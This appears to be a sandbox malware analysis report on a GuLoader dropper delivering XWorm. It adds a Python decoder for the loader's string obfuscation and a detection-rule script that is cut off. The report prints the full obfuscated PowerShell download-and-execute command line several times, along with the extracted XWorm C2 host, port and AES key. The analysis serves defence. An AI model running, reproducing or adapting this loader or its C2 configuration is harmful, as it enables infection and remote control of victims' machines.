

Windows Analysis Report
zap.cmd

Overview

General Information

Sample name: zap.cmd
Analysis ID: 1446788
MD5: 5521519d477ec8b95c87ad7ffc115145
SHA1: 551da12ea131d7bf60646a35cfcd8a3a16905f94
SHA256: 3a399d16db8e57cf727a03f4d9ad33624c08571c0f0b2e4120095e4622c22e19
Tags: cmd

Detection

GuLoader, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 6480 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\zap.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5092 cmdline: powershell.exe -windowstyle hidden "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. 
Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. 
Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko Barnp G ne ');$Emplanes=hdrede 'Super$PondsPMonocySkrddrSensua WaldnAltico Aggri B ofdUnd.r.Go wiDTv.faoTriplwSk.tenBas slDot.noUnrubaPhysidAn,roFSuperi.alacl oreaeTande(Offer$AttraL Stito Rep.dP.rnod.xhaleBajonnFjerndNonreeStrans Swea,Hyper$Gi,lyBThermrSofa a VelknBesprdAfgift pu.raUnatulMoraletorp.rBaga.nForvieTanke)Blsop ';$Brandtalerne=$Boglrdes[0];Smrkers (hdrede ' Nati$Namarg ,dkllG,ainoKontrbUndera.kidel.seud:cauldWModele unids EmbrlCoa,jeEnodayCivicij,llasOvnlamRewei9N.rma0Buffi=Overt( t afTMagtbeE,linsEf,ustIndsm-HushoPsamplaPhthatConvihAutoc Kinne$ContrBStenorNonseaBlkklnOxhordUngautCivila CoralrenteeGlimrrWal mnVeugleInsim)Cyc o ');while (!$Wesleyism90) {Smrkers (hdrede 'Legum$Mandag DivelFraadopro.abConsua Jagtl Torf:Tug eAUddykuSu ulmSlowfaSpy.kgMutuaaGl,tt=Sp.se$SolistFugtfr ndsiuSoviee pun ') ;Smrkers $Emplanes;Smrkers (hdrede 'neuroS,ugtutGoldsa.ylesrRaf,itErsta- Vat,SU,envlTr,moeNringeSakulpM chi Efflo4For,r ');Smrkers (hdrede 'Behag$ jemvg,rammlTrompo RulabGavlhahage,lSamsp:G.addW And egablesRotunl Paroe Ta,syCentriSerboscercimF.rbu9Aboli0 har=f rme( DiscTTo pleSagfrsDob,etFlerv-Rund.PSammeaSkylltYndigh Bn s svovl$Ttn nBSax fr,reinaDeo ynBajadd Benjt.rochaStubblPretreUnconr ,hennIre eeTintn)Infes ') ;Smrkers (hdrede 'Panno$huen,g Va,dl adreo Kr sbAmbosa StrilStryg:Tro aNEkstraRododb S raoStarti KoranAlabatSighteKursurOarl.vGunvoaRebapl Em,slMontreAnorct OmsvsU sty=Aaleg$Re.tigGuidolOrienoPolstbUndosaTi kllLejli:KorntPDeambrComp t SubheooblanMinictMiddliYunkesLagertOdyss+Da,ha+Hj.es% 
Wood$ZulhiS.nempoBarbemTserbmFelaheWel,er,ashhfGhaneu.ipargHerenlOpnaaeSalgsmFuldmoFettsdSvigteErgo.lTereslPerfue DiserGoorosNepa..Toccac Forno S mtuEkspon BagltTermo ') ;$Loddendes=$Sommerfuglemodellers[$Nabointervallets];}$Programpakke=340015;$Leath=26897;Smrkers (hdrede ',kris$HypergCoopelKnaldoUmorabGtersaKvintlF.ail:Sdes CNringoForb.nScir fIncurlSixmoa .isctBenedeHanga Destr= Indo ScrumGTe.hne AlqutTae i-LkkerC AnveoAeolon CholtC ocaeUltran.rstetPeace Raptu$varieBU prer AppeaByvaan LngddKn trtSkue.aGramml B.lteU.derrSpacin Bofoe Brak ');Smrkers (hdrede 'Raket$.oknigRebral TabeoCephab.oophaUdboml Bass:PraetAForrelDoku bGenreiTeamen SvovoAcc,lePox.nn Capa Acron=Overs Ge,ni[DokumS.nwaly steosDybdetForskeImponmSmede.R sciC HippoKorrentringvAfnazeimperrShohetRampo]Idiom:Super:L,phiFGill.r Sunso Tranm BidrB.leipaAtom,sUnpure Vika6 est4ElectS Pip.tTroldrM,croi WadmnP tgigPand.(Pter,$ TracC Ko.goSped.nPilhefSemiflRin,ea BrantJordve.aane)Dodec ');Smrkers (hdrede ' Unla$SpheggH ngal SpiloTylotbFor,aa FlytlD rth:Unna,AFordomUnsapp KenyuIdolit SoejeVar.ledogm sLokal .icqu=Deorb Trime[BarkaSbenv.yOverdsMonomtDissee ummmSagsk.UfrihT A.fdeS lidxArcadtjeapo.SalthEGl.ednSiv rcForgeoUmbosdBronciWate,n De.og,idym]Kunde:Dis,e:MoeriASangdSBurlaCReachI limI,ohor.DentiGUnmapeObliqtM.edsS EleptEndosrS.guaiDiakon Undegvitro(Unp,r$ProduAnonanl Drbeb ,horiE tern WankoInt,reUnsysnFo be)Etats ');Smrkers (hdrede 'Frank$NorthgNobl lUdlaao,agplbStudea serolTuber: BiofAFilipl KissvNonnaa Lo an Mikk= Nat $Sej tA asermOvercpMonjauEquiltSi hoeBastaeStnkesChapp.UnremsMicr uChirobC.rvisMa ultUdsgnrHeinriInconnIgl egVene.(Handw$BlitzPQuipsrHjemmo sa vgHab.trHalola RechmPelsdpInsalaUnc lkAbdickSuseneLowwo, Angr$ UninLTilvre E traneglitResishRedni)C.ssa ');Smrkers $Alvan;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 500 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Innumerable.Sno && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5144 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. 
Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. 
Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko Barnp G ne ');$Emplanes=hdrede 'Super$PondsPMonocySkrddrSensua WaldnAltico Aggri B ofdUnd.r.Go wiDTv.faoTriplwSk.tenBas slDot.noUnrubaPhysidAn,roFSuperi.alacl oreaeTande(Offer$AttraL Stito Rep.dP.rnod.xhaleBajonnFjerndNonreeStrans Swea,Hyper$Gi,lyBThermrSofa a VelknBesprdAfgift pu.raUnatulMoraletorp.rBaga.nForvieTanke)Blsop ';$Brandtalerne=$Boglrdes[0];Smrkers (hdrede ' Nati$Namarg ,dkllG,ainoKontrbUndera.kidel.seud:cauldWModele unids EmbrlCoa,jeEnodayCivicij,llasOvnlamRewei9N.rma0Buffi=Overt( t afTMagtbeE,linsEf,ustIndsm-HushoPsamplaPhthatConvihAutoc Kinne$ContrBStenorNonseaBlkklnOxhordUngautCivila CoralrenteeGlimrrWal mnVeugleInsim)Cyc o ');while (!$Wesleyism90) {Smrkers (hdrede 'Legum$Mandag DivelFraadopro.abConsua Jagtl Torf:Tug eAUddykuSu ulmSlowfaSpy.kgMutuaaGl,tt=Sp.se$SolistFugtfr ndsiuSoviee pun ') ;Smrkers $Emplanes;Smrkers (hdrede 'neuroS,ugtutGoldsa.ylesrRaf,itErsta- Vat,SU,envlTr,moeNringeSakulpM chi Efflo4For,r ');Smrkers (hdrede 'Behag$ jemvg,rammlTrompo RulabGavlhahage,lSamsp:G.addW And egablesRotunl Paroe Ta,syCentriSerboscercimF.rbu9Aboli0 har=f rme( DiscTTo pleSagfrsDob,etFlerv-Rund.PSammeaSkylltYndigh Bn s svovl$Ttn nBSax fr,reinaDeo ynBajadd Benjt.rochaStubblPretreUnconr ,hennIre eeTintn)Infes ') ;Smrkers (hdrede 'Panno$huen,g Va,dl adreo Kr sbAmbosa StrilStryg:Tro aNEkstraRododb S raoStarti KoranAlabatSighteKursurOarl.vGunvoaRebapl Em,slMontreAnorct OmsvsU sty=Aaleg$Re.tigGuidolOrienoPolstbUndosaTi kllLejli:KorntPDeambrComp t SubheooblanMinictMiddliYunkesLagertOdyss+Da,ha+Hj.es% 
Wood$ZulhiS.nempoBarbemTserbmFelaheWel,er,ashhfGhaneu.ipargHerenlOpnaaeSalgsmFuldmoFettsdSvigteErgo.lTereslPerfue DiserGoorosNepa..Toccac Forno S mtuEkspon BagltTermo ') ;$Loddendes=$Sommerfuglemodellers[$Nabointervallets];}$Programpakke=340015;$Leath=26897;Smrkers (hdrede ',kris$HypergCoopelKnaldoUmorabGtersaKvintlF.ail:Sdes CNringoForb.nScir fIncurlSixmoa .isctBenedeHanga Destr= Indo ScrumGTe.hne AlqutTae i-LkkerC AnveoAeolon CholtC ocaeUltran.rstetPeace Raptu$varieBU prer AppeaByvaan LngddKn trtSkue.aGramml B.lteU.derrSpacin Bofoe Brak ');Smrkers (hdrede 'Raket$.oknigRebral TabeoCephab.oophaUdboml Bass:PraetAForrelDoku bGenreiTeamen SvovoAcc,lePox.nn Capa Acron=Overs Ge,ni[DokumS.nwaly steosDybdetForskeImponmSmede.R sciC HippoKorrentringvAfnazeimperrShohetRampo]Idiom:Super:L,phiFGill.r Sunso Tranm BidrB.leipaAtom,sUnpure Vika6 est4ElectS Pip.tTroldrM,croi WadmnP tgigPand.(Pter,$ TracC Ko.goSped.nPilhefSemiflRin,ea BrantJordve.aane)Dodec ');Smrkers (hdrede ' Unla$SpheggH ngal SpiloTylotbFor,aa FlytlD rth:Unna,AFordomUnsapp KenyuIdolit SoejeVar.ledogm sLokal .icqu=Deorb Trime[BarkaSbenv.yOverdsMonomtDissee ummmSagsk.UfrihT A.fdeS lidxArcadtjeapo.SalthEGl.ednSiv rcForgeoUmbosdBronciWate,n De.og,idym]Kunde:Dis,e:MoeriASangdSBurlaCReachI limI,ohor.DentiGUnmapeObliqtM.edsS EleptEndosrS.guaiDiakon Undegvitro(Unp,r$ProduAnonanl Drbeb ,horiE tern WankoInt,reUnsysnFo be)Etats ');Smrkers (hdrede 'Frank$NorthgNobl lUdlaao,agplbStudea serolTuber: BiofAFilipl KissvNonnaa Lo an Mikk= Nat $Sej tA asermOvercpMonjauEquiltSi hoeBastaeStnkesChapp.UnremsMicr uChirobC.rvisMa ultUdsgnrHeinriInconnIgl egVene.(Handw$BlitzPQuipsrHjemmo sa vgHab.trHalola RechmPelsdpInsalaUnc lkAbdickSuseneLowwo, Angr$ UninLTilvre E traneglitResishRedni)C.ssa ');Smrkers $Alvan;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 2268 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Innumerable.Sno && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 2948 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
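The PowerShell command line in the process tree above is readable once its one helper is understood. `$Plethorous` is assembled as `'Sub'+'strin'+'g'` (the method name `Substring`), and `hdrede` walks each string literal taking a single character at index 5, 11, 17, ... and ignoring the final character (`$Preflood = length - 1`); everything else is filler. `Smrkers` then runs the decoded text through whatever `$Traguloidea` decodes to. The following decoder is an added worked example, written for this page rather than taken from the report or the sample: it reimplements that scheme in Python and runs it over three literals copied verbatim from the command line (`$Indlaes`, `$Traguloidea`, `$Gainyield`). The `start`/`step` parameters and the `decode_script` helper are this example's own generalisation, so the same code can be pointed at a variant that changes the offsets.

```python
"""Decoder for the hdrede string obfuscation used by the zap.cmd PowerShell stage.

Added example for this write-up, not code from the Joe Sandbox report. The
sample literals below are copied verbatim from the command line of PID 5092.
"""
import re

# $Indlaes: the literal that becomes the cmd.exe child's command line.
INDLAES = r" Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in "
# $Traguloidea: the command name that Smrkers invokes with '&'.
TRAGULOIDEA = " LeeuiPhiloeCotylxBront "
# $Gainyield: a one-character literal.
GAINYIELD = "Pino,> orma "


def hdrede(blob, start=5, step=6):
    """Python form of the loader's helper.

    PowerShell original:
        $Preflood = $s.Length - 1
        For ($i = 5; $i -lt $Preflood; $i += 6) { $out += $s.Substring($i, 1) }
    i.e. keep one character in every six, starting at index 5, and never read
    the last character. start/step are parameters here (this example's own)
    so a variant with different constants can be decoded with the same code.
    """
    return "".join(blob[i] for i in range(start, len(blob) - 1, step))


# Matches `hdrede '...'` whether the call is bare or wrapped as (hdrede '...').
# The literals in this sample contain no single quotes, so [^']* is sufficient.
HDREDE_CALL = re.compile(r"hdrede\s+'([^']*)'")


def decode_script(script, start=5, step=6):
    """Return every hdrede literal found in a script fragment, decoded, in order."""
    return [hdrede(lit, start, step) for lit in HDREDE_CALL.findall(script)]


if __name__ == "__main__":
    for label, literal in (("$Indlaes", INDLAES),
                           ("$Traguloidea", TRAGULOIDEA),
                           ("$Gainyield", GAINYIELD)):
        print(f"{label:13} -> {hdrede(literal)!r}")
    # A fragment in the shape of the real script (constructed from the page):
    fragment = "$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';Smrkers (hdrede 'Pino,> orma ');"
    print(decode_script(fragment))
```

`$Indlaes` decodes to `echo %appdata%\Innumerable.Sno && echo t`, which is exactly the command line of the cmd.exe children (PIDs 500 and 2268): the loader shells out to cmd.exe to expand `%appdata%` and obtain the path of a file it stages. `$Traguloidea` decodes to `iex`, so `Smrkers` is `Invoke-Expression` and every `Smrkers (hdrede '...')` call is a decoded statement being executed. One caveat when working from this rendered page: the HTML extraction collapsed runs of spaces inside some literals (the User-Agent string assigned to `$Stikprop` and the sendspace URL in `$Loddendes` are affected), so those do not decode cleanly from the text shown here. Decode them from the raw command line as captured by Sysmon Event ID 1 or Security Event ID 4688 with command-line auditing enabled, or from the report's downloadable script, where the spacing is intact.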
Malware configuration (XWorm, extracted from wab.exe memory):
{"C2 url": ["tbsagyw.duckdns.org"], "Port": "8896", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Yara matches (memory dumps)

Source | Rule | Description | Author
0000000C.00000002.3376138960.0000000023191000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000006.00000002.2615577920.0000000008440000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000006.00000002.2609130468.000000000573F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000006.00000002.2616022619.000000000A044000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
00000003.00000002.2834421548.0000024C677EE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
(6 further memory-dump matches are not shown in this extract)
Yara matches (AMSI script buffers)

Source | Rule | Description | Author
amsi64_5092.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_5144.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen

Matched strings for amsi32_5144.amsi.csv:
• 0xdfd9:$b2: ::FromBase64String(
• 0xd0b2:$s1: -join
• 0x685e:$s4: +=
• 0x6920:$s4: +=
• 0xab47:$s4: +=
• 0xcc64:$s4: +=
• 0xcf4e:$s4: +=
• 0xd094:$s4: +=
• 0x1677c:$s4: +=
• 0x167fc:$s4: +=
• 0x168c2:$s4: +=
• 0x16942:$s4: +=
• 0x16b18:$s4: +=
• 0x16b9c:$s4: +=
• 0xd881:$e4: Get-WmiObject
• 0xda70:$e4: Get-Process
• 0xdac8:$e4: Start-Process
• 0x1529d:$e4: Get-Process

System Summary

Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell.exe -windowstyle hidden "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. 
Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko Barnp G ne ');$Emplanes=hdrede 'Super$PondsPMonocySkrddrSensua WaldnAltico
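The Sigma hit above fires on the hidden-window PowerShell start alone. The process tree carries three more signals worth encoding in a detection: the string-concatenation and `$obj.$method.Invoke(` obfuscation in the command line, a 64-bit powershell.exe spawning the SysWOW64 (32-bit) powershell.exe, and PowerShell spawning wab.exe, the Windows Contacts binary that GuLoader here uses as its injection host. The following triage pass over process-creation events is an added example written for this page (not Joe Sandbox code). Its events are constructed from the report's process tree: PIDs, parent PIDs and image paths are the ones shown, the two PowerShell command lines are excerpts cut with `...` because the originals run to several kilobytes, and conhost.exe is omitted. The tag names, the `INJECTION_HOSTS` list and the regexes are this example's own.

```python
"""Process-tree triage rules for the zap.cmd execution chain.

Added example for this write-up, not Joe Sandbox code. PROCESS_EVENTS is
constructed from the process tree in the report (command lines excerpted).
"""
import re

# $name='Sub';$name+='strin'   -> a method name assembled from fragments
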